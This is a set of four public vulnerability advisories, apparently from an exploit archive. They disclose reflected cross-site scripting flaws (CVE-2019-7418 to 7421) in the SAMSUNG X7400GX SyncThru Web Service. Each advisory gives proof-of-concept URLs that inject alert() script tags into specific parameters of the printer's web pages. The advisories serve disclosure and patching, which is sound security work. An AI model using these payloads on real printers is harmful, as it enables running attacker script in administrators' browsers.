<!--
# Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web
Service
# Date: 24-01-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.samsungprinter.com/,
http://www.samsung.com/Support/ProductSupport/download/index.aspx
# Software Link: http://www.samsungprinter.com/,
http://www.samsung.com/Support/ProductSupport/download/index.aspx
# Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System
Firmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015
# Tested on: all
# CVE : CVE-2019-7418
# Category: webapps
1. Description
XSS exists in SAMSUNG X7400GX SyncThru Web Service V6.A6.25
V11.01.05.25_08-21-2015 in "/sws/swsAlert.sws" in multiple parameters:
flag, frame, func, and Nfunc.
2. Proof of Concept
URL
http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=closePopup('successMsg
','','')&flag=&frame=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org
&msg=The%20requested%20report(s)%20will%20be%20printed
Parameter
frame=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org
URL
http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=closePopup('successMsg
','','')&flag=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org
&frame=&msg=The%20requested%20report(s)%20will%20be%20printed
Parameter
flag=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org
URL
http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed
Parameter
Nfunc=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org
URL
http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org&Nfunc=closePopup('successMsg
','','')&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed
Parameter
func=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org
URL
http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org&bullet=suc&func=&Nfunc=closePopup('successMsg
','','')&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed
Parameter
type=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org
URL
http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=closePopup('successMsg
','','')&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed
Parameter
popupid=<SCRIPT>alert("XSS");</SCRIPT>
3. Solution:
Update to last version this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
-->
<!--
# Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web
Service
# Date: 24-01-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.samsungprinter.com/,
http://www.samsung.com/Support/ProductSupport/download/index.aspx
# Software Link: http://www.samsungprinter.com/,
http://www.samsung.com/Support/ProductSupport/download/index.aspx
# Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System
Firmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015
# Tested on: all
# CVE : CVE-2019-7419
# Category: webapps
1. Description
XSS exists in SAMSUNG X7400GX SyncThru Web Service V6.A6.25
V11.01.05.25_08-21-2015 in "/sws/leftmenu.sws" in multiple parameters:
ruiFw_id, ruiFw_pid, ruiFw_title.
2. Proof of Concept
URL
http://X.X.X.X/sws/leftmenu.sws?ruiFw_id=FirmwareVersion&ruiFw_pid=Maintenance&ruiFw_title=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E
Parameter
ruiFw_title=<SCRIPT>alert(XSS);</SCRIPT>
URL
http://X.X.X.X/sws/leftmenu.sws?ruiFw_id=FirmwareVersion&ruiFw_pid=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E&ruiFw_title=Mantenimiento
Parameter
ruiFw_pid=<SCRIPT>alert(XSS);</SCRIPT>
URL
http://X.X.X.X/sws/leftmenu.sws?ruiFw_id=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E&ruiFw_pid=Maintenance&ruiFw_title=Mantenimiento
Parameter
ruiFw_id=<SCRIPT>alert(XSS);</SCRIPT>
3. Solution:
Update to last version this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
-->
<!--
# Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web
Service
# Date: 24-01-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.samsungprinter.com/,
http://www.samsung.com/Support/ProductSupport/download/index.aspx
# Software Link: http://www.samsungprinter.com/,
http://www.samsung.com/Support/ProductSupport/download/index.aspx
# Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System
Firmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015
# Tested on: all
# CVE : CVE-2019-7420
# Category: webapps
1. Description
XSS exists in SAMSUNG X7400GX SyncThru Web Service V6.A6.25
V11.01.05.25_08-21-2015 in
"/sws.application/information/networkinformationView.sws" in the tabName
2. Proof of Concept
URL
http://X.X.X.X/sws.application/information/networkinformationView.sws?tabName=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E
Parameter
tabName=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E
3. Solution:
Update to last version this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
-->
<!--
# Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web
Service
# Date: 24-01-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.samsungprinter.com/,
http://www.samsung.com/Support/ProductSupport/download/index.aspx
# Software Link: http://www.samsungprinter.com/,
http://www.samsung.com/Support/ProductSupport/download/index.aspx
# Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System
Firmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015
# Tested on: all
# CVE : CVE-2019-7421
# Category: webapps
1. Description
XSS exists in SAMSUNG X7400GX SyncThru Web Service V6.A6.25
V11.01.05.25_08-21-2015 in "/sws.login/gnb/loginView.sws" in multiple
parameters: contextpath and basedURL.
2. Proof of Concept
URL
http://X.X.X.X/sws.login/gnb/loginView.sws?contextpath=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org
Parameter
contextpath=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org
URL
http://X.X.X.X/sws.login/gnb/loginView.sws?basedURL=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E&popupid=id_Login
Parameter
basedURL=<SCRIPT>alert(XSS);</SCRIPT>
3. Solution:
Update to last version this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
-->